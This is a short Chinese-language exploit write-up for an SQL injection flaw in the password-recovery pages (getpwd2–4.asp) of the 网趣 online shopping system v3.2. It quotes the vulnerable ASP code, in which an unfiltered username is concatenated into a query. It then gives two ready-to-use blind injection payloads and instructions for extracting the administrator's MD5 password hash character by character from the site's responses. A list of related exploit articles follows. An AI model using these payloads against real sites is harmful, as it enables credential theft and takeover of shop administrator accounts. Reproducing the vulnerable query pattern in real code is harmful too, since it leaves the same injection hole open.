涉及版本:网趣网上购物系统时尚版 v3.2
漏洞文件:getpwd2.asp,getpwd3.asp,getpwd4.asp
漏洞描述:变量username未经过滤带入sql查询,存在SQL注入漏洞.
关键代码:
<%
username=request.form("username")
set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from [user] where username='"&username&"' "
rs.open sql,conn,1,1
If rs.eof Then
%>
<script language="javascript">
alert("这个用户没有注册,请注册!")
;javascrip:close();</script>
<%
End If
%>
<html><head><title>取回密码 | 回答问题</title>
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="images/css.css" rel="stylesheet" type="text/css">
<script language="javascript">
<!--
function form1_onsubmit() {
if (document.form1.answer.value=="")
{
alert("请输入您的问题答案。")
document.form1.answer.focus()
return false
}
}
// --></script>
利用方法:
post提交数据(可以借用剑心的Sql.htm[http://www.loveshell.net/blog/blogview.asp?logID=70]),默认管理员ID为4,密码为16位md5(小写字母),确定下范围0-9的asc值48-57,小写字母的asc值97-122
' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 48 and 57)<>0 and ''='
' or (select count(*) from admin where adminid=4 and asc(mid(password,N,1)) between 97 and 122)<>0 and ''='
正确返回"取回密码",错误返回对话框"这个用户没有注册,请注册!"
只显示10条记录相关文章
网趣网上购物多用户时尚版最新版本存在漏洞 (浏览: 8736, 评论: 0)
网趣网上购物系统时尚版10.3注入漏洞 (浏览: 12720, 评论: 0)
网趣网上购物系统时尚版V9.7注入漏洞--price.asp (浏览: 11293, 评论: 0)
网趣网上购物系统HTML静态版 v2010 注射 (浏览: 15968, 评论: 0)
网趣网上购物系统时尚版 v9.7/bbs后台真正拿shell (浏览: 12483, 评论: 0)
网趣购物商城V9.6SQL注入利程序 (浏览: 9735, 评论: 0)
网趣网上购物系统统一版getpwd4.asp漏洞(SQL防注入) (浏览: 9935, 评论: 0)
网趣网上购物系统时尚版v3.0注册注射漏洞 (浏览: 10196, 评论: 0)
网趣网上购物系统SQL注入漏洞--getpwd2.asp (浏览: 7960, 评论: 0)